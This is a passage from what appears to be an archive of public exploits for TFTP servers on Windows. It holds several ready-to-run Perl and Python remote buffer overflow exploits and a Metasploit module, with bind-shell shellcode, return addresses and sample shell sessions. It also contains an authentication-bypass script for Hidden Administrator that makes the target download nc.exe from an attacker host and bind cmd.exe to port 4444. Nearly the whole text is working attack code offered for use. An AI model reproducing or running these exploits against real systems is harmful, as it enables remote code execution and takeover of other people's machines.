$exploit = "\x00\x02" . $pad . $shellcode . $eip . "\0" . $mode . "\0";
print $victim $exploit;
print " + Malicious request sent ...\n";
sleep(2);
print "Done.\n";
close($victim);
exit;
# [2006-12-03]
69 TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl <target host> <port>\n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
my $nop0="\x90"x15;
#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN
my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
my $nop="\x90"x57;
my $nop1="\x90"x7;
my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
$shellcode =
"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x 0C\x8B\x49\x1C".
"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x 32\x52\x68\x77".
"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\x F4\x95\x57\x60".
"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x 03\xDD\x33\xFF".
"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x 3C\x71\x75\xF7".
"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x 8B\x3C\x7B\x8B".
"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x 3B\xF7\x75\xB4".
"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x 30\x8B\xFC\xF3".
"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x 11\x5c\x32\xE4".
"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x 24\x2D\xFE\x44".
"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x 50\x50\x54\x50".
"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
$exploit = "\x00\x01" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. "\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
print $victim $exploit;
print " + Malicious request sent ...\n";
sleep(2);
print "Done.\n";
close($victim);
$host = $ARGV[0];
print " + connect to 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
# [2007-01-15]
69 3Com TFTP Service <= 2.0.1 Remote Buffer Overflow Exploit (meta)
package Msf::Exploit::3com_tftp_long_mode;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
my $advanced =
{
};
my $info =
{
'Name' => 'TFTP Server 3CTftpSvc Buffer Overflow Vulnerability',
'Version' => '$ 1.0 $',
'Authors' => ['Enseirb <vincenty [at] enseirb.fr>', ],
'Description' =>
Pex::Text::Freeform(qq{
This vulnerability is caused due to a boundary error during the processing of TFTP Read/Write request packet types. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted packet with an overly long mode field (more than 460 bytes).
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The TFTP target adress', "127.0.0.1" ],
'RPORT' => [ 0, 'PORT', 'The TFTP target port', 69 ],
},
'Payload' =>
{
'Space' => 344,
'BadChars' => "\x00",
},
'Refs' =>
[
['URL', 'http://www.securityfocus.com/bid/21301'],
['CVE', '2006-6183'],
['URL', 'http://secunia.com/advisories/23113'],
['URL', 'http://www.securityfocus.com/archive/1/452754'],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ '0 - Windows XP SP2 ENG', 0x77d4e23b ], #or 0x77bc2063
[ '1 - Windows XP SP1 FR', 0x77d8117b ],
[ '2 - Windows XP SP2 FR', 0x77d8d9af ],
],
'Keys' => [ '3com' ],
'DisclosureDate' => 'Nov 27 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_idx = $self->GetVar('TARGET');
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $buff = "\x00\x02"; # for a WRQ (WriteReQuest) (or "\x00\x01" for a RRQ)
$buff .= "filename_string";
$buff .= "\x00";
$buff .= $self->MakeNops(129) . $shellcode;
$buff .= pack('V',$target->[1]);
$buff .= "\x00";
$self->PrintLine('[+] Try to connect... ' . $target_host . ':' . $target_port);
my $s = Msf::Socket::Udp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[-] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine('[+] Connected!');
$self->PrintLine('[+] Sending exploit...');
$s->Send($buff);
$self->PrintLine('[+] Exploit sent!');
$s->Close();
return;
}
1;
# [2007-01-21]
69 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl)
#!/usr/bin/perl -w
# ================================================== =============================================
# 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit
# By Umesh Wanve ([email protected])
# ================================================== ============================================
# Credits : Liu Qixu is credited with the discovery of this vulnerability.
#
# Reference : http://www.securityfocus.com/bid/21301
#
# Date : 27-02-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer overflow exists in transporting mode name of TFTP server.
#
# So here you go.
#
# Buffer = "\x00\x02" + "filename" + "\x00" + nop sled + Shellcode + JUMP + "\x00";
#
#
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
#
# #
#================================================= ==============================================
use IO::Socket;
if(!($ARGV[1]))
{
print "\n3COM Tftp long transport name exploit\n";
print "\tCoded by Umesh wanve\n\n";
print "Use: 3com_tftp.pl <host> <port>\n\n";
exit;
}
$target = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my($shellcode)=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x48".
"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\x a0\x31\x4c\xab".
"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x 30\xc9\x5c\xdf".
"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\x a6\xf9\x73\xcd".
"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x 73\x9c\x97\x7c".
"\x3d\x2d\x38\x0b\x6c\xc9\x58\x32\xc3\xc4\xf8\xdf\x 17\xd4\xb2\xbf".
"\x4b\xe4\x38\xdd\x24\xec\xaf\x35\x8b\xf9\x68\x30\x c3\x8b\x83\xdf".
"\x08\xc4\x38\x24\x54\x65\x38\x14\x40\x96\xdb\xda\x 06\xc6\x5f\x04".
"\xb7\x1e\xd5\x07\x2e\xa0\x80\x66\x20\xbf\xc0\x66\x 17\x9c\x4c\x84".
"\x20\x03\x5e\xa8\x73\x98\x4c\x82\x17\x41\x56\x32\x c9\x25\xbb\x56".
"\x1d\xa2\xb1\xab\x98\xa0\x6a\x5d\xbd\x65\xe4\xab\x 9e\x9b\xe0\x07".
"\x1b\x9b\xf0\x07\x0b\x9b\x4c\x84\x2e\xa0\xa2\x08\x 2e\x9b\x3a\xb5".
"\xdd\xa0\x17\x4e\x38\x0f\xe4\xab\x9e\xa2\xa3\x05\x 1d\x37\x63\x3c".
"\xec\x65\x9d\xbd\x1f\x37\x65\x07\x1d\x37\x63\x3c\x ad\x81\x35\x1d".
"\x1f\x37\x65\x04\x1c\x9c\xe6\xab\x98\x5b\xdb\xb3\x 31\x0e\xca\x03".
"\xb7\x1e\xe6\xab\x98\xae\xd9\x30\x2e\xa0\xd0\x39\x c1\x2d\xd9\x04".
"\x11\xe1\x7f\xdd\xaf\xa2\xf7\xdd\xaa\xf9\x73\xa7\x e2\x36\xf1\x79".
"\xb6\x8a\x9f\xc7\xc5\xb2\x8b\xff\xe3\x63\xdb\x26\x b6\x7b\xa5\xab".
"\x3d\x8c\x4c\x82\x13\x9f\xe1\x05\x19\x99\xd9\x55\x 19\x99\xe6\x05".
"\xb7\x18\xdb\xf9\x91\xcd\x7d\x07\xb7\x1e\xd9\xab\x b7\xff\x4c\x84".
"\xc3\x9f\x4f\xd7\x8c\xac\x4c\x82\x1a\x37\x63\x3c\x b8\x42\xb7\x0b".
"\x1b\x37\x65\xab\x98\xc8\xb3\x54";
print "++ Building Malicous Packet .....\n";
$nop="\x90" x 129;
$jmp_2000 = "\x0e\x08\xe5\x77"; # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)
$exploit = "\x00\x02"; #write request (header)
$exploit=$exploit."A"; #file name
$exploit=$exploit."\x00"; #Start of transporting name
$exploit=$exploit.$nop; #nop sled to land into shellcode
$exploit=$exploit.$shellcode; #our Hell code
$exploit=$exploit.$jmp_2000; #jump to shellcode
$exploit=$exploit."\x00"; #end of TS mode name
print $target $exploit; #Attack on victim
print "++ Exploit packet sent ...\n";
print "++ Done.\n";
print "++ Telnet to 4444 on victim's machine ....\n";
sleep(2);
close($target);
exit;
#------------------------------------------------------------------------------------------------------------
# [2007-02-28]
69 FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
#!/usr/bin/perl
# ================================================== =============================================
# FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
# By Umesh Wanve
# ================================================== =============================================
#
# Date : 22-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
# NOP Sled === Nop Sled
# |
# Hellcode === Hell.........
#
# This exploit will open port 5555 on remote server. Connect it to open shell.
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be
# responsible for any damage.
#
# Always Thanks to Metasploit.
#
#================================================= =================================================
use IO::Socket;
#use strict;
my($read_request)="\x00\x01"; # GET or PUT request
my($tailer)="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"; #transporting mode (eg. netascii)
# win32_bind - EXITFUNC=seh LPORT=5555 Size=344 Encoder=Pex http://metasploit.com
my($shellcode)=
"\x90\x90\x90\x90". #padding
"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x60".
"\x5f\x45\x77\x83\xee\xfc\xe2\xf4\x9c\x35\xae\x3a\x 88\xa6\xba\x88".
"\x9f\x3f\xce\x1b\x44\x7b\xce\x32\x5c\xd4\x39\x72\x 18\x5e\xaa\xfc".
"\x2f\x47\xce\x28\x40\x5e\xae\x3e\xeb\x6b\xce\x76\x 8e\x6e\x85\xee".
"\xcc\xdb\x85\x03\x67\x9e\x8f\x7a\x61\x9d\xae\x83\x 5b\x0b\x61\x5f".
"\x15\xba\xce\x28\x44\x5e\xae\x11\xeb\x53\x0e\xfc\x 3f\x43\x44\x9c".
"\x63\x73\xce\xfe\x0c\x7b\x59\x16\xa3\x6e\x9e\x13\x eb\x1c\x75\xfc".
"\x20\x53\xce\x07\x7c\xf2\xce\x37\x68\x01\x2d\xf9\x 2e\x51\xa9\x27".
"\x9f\x89\x23\x24\x06\x37\x76\x45\x08\x28\x36\x45\x 3f\x0b\xba\xa7".
"\x08\x94\xa8\x8b\x5b\x0f\xba\xa1\x3f\xd6\xa0\x11\x e1\xb2\x4d\x75".
"\x35\x35\x47\x88\xb0\x37\x9c\x7e\x95\xf2\x12\x88\x b6\x0c\x16\x24".
"\x33\x0c\x06\x24\x23\x0c\xba\xa7\x06\x37\x50\xc4\x 06\x0c\xcc\x96".
"\xf5\x37\xe1\x6d\x10\x98\x12\x88\xb6\x35\x55\x26\x 35\xa0\x95\x1f".
"\xc4\xf2\x6b\x9e\x37\xa0\x93\x24\x35\xa0\x95\x1f\x 85\x16\xc3\x3e".
"\x37\xa0\x93\x27\x34\x0b\x10\x88\xb0\xcc\x2d\x90\x 19\x99\x3c\x20".
"\x9f\x89\x10\x88\xb0\x39\x2f\x13\x06\x37\x26\x1a\x e9\xba\x2f\x27".
"\x39\x76\x89\xfe\x87\x35\x01\xfe\x82\x6e\x85\x84\x ca\xa1\x07\x5a".
"\x9e\x1d\x69\xe4\xed\x25\x7d\xdc\xcb\xf4\x2d\x05\x 9e\xec\x53\x88".
"\x15\x1b\xba\xa1\x3b\x08\x17\x26\x31\x0e\x2f\x76\x 31\x0e\x10\x26".
"\x9f\x8f\x2d\xda\xb9\x5a\x8b\x24\x9f\x89\x2f\x88\x 9f\x68\xba\xa7".
"\xeb\x08\xb9\xf4\xa4\x3b\xba\xa1\x32\xa0\x95\x1f\x 90\xd5\x41\x28".
"\x33\xa0\x93\x88\xb0\x5f\x45\x77".
"\x90\x90\x90\x90". #padding
"\x90\x90\x90\x90";
my($pointer_to_next_seh)="\xeb\x06\x90\x90"; #short jump to shellcode
my($seh_handler)="\xa9\x11\x02\x75"; #pop, pop, ret
#(ws2help.dll win2000 sp4)
#Building malicious buffer
my($buffer)=$read_request.("A" x 268).$pointer_to_next_seh.$seh_handler.$shellcode. $tailer;
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "69",
Proto => "UDP"))
{
print "++Building Packet......\n" ;
print "++Connecting to server.....\n";
print "++Sending Buffer ....\n";
print "++Exploit Successfull...\n";
print "++Connect to victim on 5555.....\n";
# request + file name + mode
#see tftp protocol
print $socket $buffer;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:69\n";
}
# __END_CODE
# [2007-03-22]
69 Rational Software Hidden Administrator 1.7 Auth Bypass Exploit
################################################## ##################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# http://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h <host ip> -p <port> -t <tftpd server ip> #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
################################################## ##################################
import socket
import struct
import time
import sys
import getopt
def usage():
print "\n"
print "################################################## ####"
print "# Hidden Administrator Authentication Bypass Exploit #"
print "# Coded By ahmed[at]rewterz.com #"
print "################################################## ####"
print "\n"
print "Usage: %s -h <host ip> -p <port> -t <tftpd server ip>" % sys.argv[0]
print "make sure nc.exe exists on tftpd server\n"
def exploit():
h ="%X" % (130+len(tftpd))
buff1='_file_manager_operations_copy_files_Loc_Rem _c:\\^file\r\n\x0brewt_ha.bat'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
buff1 += ('\\x' + h).decode('string_escape')
buff1 += '\x00\x00\x00\x00\x00\x00\x00'
buff1+='\x00tftp -i ' + tftpd + ' GET nc.exe c:\\nc.exe '
buff1+='\r\nc:\\nc.exe -L -d -p 4444 -e cmd.exe \r\n\r\n '
buff1+=' \r\n\r\n_file_manager_operations_get_cur_dir_c:\r\ n'
try:
print "[+] Connecting to %s" %host
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,int(port)))
print "[+] Uploading Files"
s.send(buff1)
time.sleep(2)
s.send('+run_C:\\rewt_ha.bat|\r\n')
time.sleep(1)
print "[+] DONE [+]"
print "[+] Now Connect to port 4444 on victim IP !!!"
except:
print "[+] Could not connect to the server"
if len(sys.argv)<7:
usage()
sys.exit()
try:
options = getopt.getopt(sys.argv[1:], 'h:p:t:')[0]
except getopt.GetoptError, err:
print err
usage()
sys.exit()
for option, value in options:
if option == '-h':
host = value
if option == '-p':
port = int(value)
if option == '-t':
tftpd=value
exploit()
# [2007-05-19]
69 TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day)
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
################################################## ################
# bt ~ # sourceforge-tftpd.py
# TFTP Server for Windows V1.4 ST (0day)
# http://www.offensive-security.com
# Sending evil packet, ph33r
# Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
################################################## ################
import socket
import sys
print " TFTP Server for Windows V1.4 ST (0day)"
print " http://www.offensive-security.com"
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
# Jump back shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x 13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\x c5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x 5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\x c0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\x e5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x 03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x 8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\x ec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x 54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x 81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\x ff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x 11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x 6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x 55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\x ff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x 6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x 6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\x d6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x 68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x 57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x 53\xff\xd6"
"\xff\xd0")
filename = "\x90"*860 + shell + "\x90"*14 + sc + "\xeb\xd0\x90\x90" + "\x2b\x0e\x41"
mode = "netascii"
muha = "\x00\x02" + filename+ "\0" + mode+ "\0"
print " Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print " Check port 4444 for bindshell"
# [2008-03-26]
69 Quick TFTP Pro 2.1 Remote SEH Overflow Exploit (0day)
#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
################################################## #######
# bt ~ # quickftp.py
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# http://www.offensive-security.com
# Sending evil packet, ph33r
# Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator>
################################################## ########
import socket
import sys
print " Quick TFTP Pro 2.1 SEH Overflow (0day)"
print " http://www.offensive-security.com"
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = "pwnd"
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x 5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\x c0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\x e5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x 03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x 8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\x ec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x 54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x 81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\x ff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x 11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x 6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x 55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\x ff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x 6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x 6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\x d6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x 68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x 57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x 53\xff\xd6"
"\xff\xd0")
mode = "A"*1019+"\xeb\x08\x90\x90"+"\x58\x14\xd3\x74"+"\x90"*16+shell
muha = "\x00\x02" + filename+ "\0" + mode + "\0"
print " Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print " Check port 4444 for bindshell"
# [2008-03-26]
69 TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <[email protected]>
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respect the RFC 1350 for Error packets, lot of other
# TFTP Servers don't respect it.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit will overwrite all the .bss section and some portion of the .idata section
# to patch functions addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.
use strict;
use IO::Socket::INET;
my $target = shift ||
die "Usage: $0 <target> <type>\n <type> : type of the program\n".
"\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";
my $type = defined $ARGV[0] ? shift : 's';
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x 15\x24" .
"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x 4f\x0d" .
"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x 91\x7b" .
"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x 7f\x13" .
"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x 12\xe0" .
"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x 3d\xd2" .
"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\x b3\x86" .
"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\x a9\x43" .
"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x 02\xfd" .
"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x 24\x1c" .
"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\x a0\x0c" .
"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\x c0\x75" .
"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x 74\x8e" .
"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\x c5\xdb" .
"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x 41\xa8" .
"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x 6d\x24" .
"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x 83\x45" .
"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\x ce\x18" .
